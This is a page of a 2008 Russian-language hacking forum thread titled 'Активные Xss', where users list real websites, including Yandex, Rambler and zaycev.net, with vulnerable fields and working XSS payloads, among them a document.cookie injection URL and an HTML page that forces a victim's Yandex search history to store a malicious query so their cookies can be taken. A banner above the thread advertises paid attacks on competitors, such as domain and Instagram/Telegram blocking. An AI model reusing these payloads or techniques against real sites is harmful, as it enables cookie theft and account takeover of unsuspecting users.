УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Активные Xss

Страница 30 из 41

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#291

21.11.2008, 20:38

~~dfgrd~~

Banned

Регистрация: 12.02.2008

Сообщений: 123

Провел на форуме:
1027073

Репутация: 172

Отправить сообщение для dfgrd с помощью ICQ

http://sacredangelro.com/svn/
в чате <script>alert(XSS)</script> в теме сообщения

#292

22.11.2008, 21:15

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Код:

liter.kz

Код:

zaycev.net

В обоих уязвимо поле поиска.
Код:

Код:

'><script>alert('xss')</script>

#293

22.11.2008, 21:50

NFM

Постоянный

Регистрация: 16.01.2006

Сообщений: 598

Провел на форуме:
5120686

Репутация: 531

это не активка, это пассивка, смотрим внимательно

#294

25.11.2008, 02:27

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

RAMBLER.RU

http://id-planet.rambler.ru/other/education/add

Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"

#295

25.11.2008, 02:48

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

http://www.ecco-shoes.ru/rsm/gallery/

там слева поля для поиска - 5 штук.

Имя
Фамилия
Электронная почта

Город
Ключевое слово

Во всех XSS

))))))))

"><script>alert('ГОЛО_СУЕМ')</script>

Последний раз редактировалось Pashkela; 25.11.2008 в 02:51..

#296

25.11.2008, 17:08

Luccifer

Познающий

Регистрация: 05.12.2006

Сообщений: 63

Провел на форуме:
1269724

Репутация: 100

Отправить сообщение для Luccifer с помощью ICQ

yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yan dex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt% 3D%2522%253E%253Cscript%253Ealert(document.cookie) %253C%2Fscript%253E%26login

#297

25.11.2008, 20:40

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

Цитата:

Сообщение от Luccifer

не работает

оперативно залатали

Последний раз редактировалось chekist; 27.11.2008 в 10:29..

#298

11.12.2008, 20:39

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

Яндекс.

На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки:

"Насильно" включить юзеру запись истории
Послать яндексу ядовитый поисковый запрос
Направить юзера на зараженную страницу истории запросов

Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:

Код:

<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>

#299

11.12.2008, 22:22

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).

Код:

<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Миракаль</title> 
</head> 
<frameset rows="30,30,30" cols="*"> 
<frame src="http://rambler.ru" name="rambler" scrolling="no" noresize> 
<frame src="http://yandex.ru" name="yandex" scrolling="no" noresize> 
<frame src="http://google.ru" name="google" scrolling="no" noresize> 
</frameset> 
</html>

Последний раз редактировалось Pashkela; 11.12.2008 в 22:29..

#300

15.12.2008, 20:27

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

otake.ru

В "псто" вставляем какбэ картинку:

Код:

javascript:eval(String.fromCharCode.....)

только для риальне воене!!!1

Страница 30 из 41

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход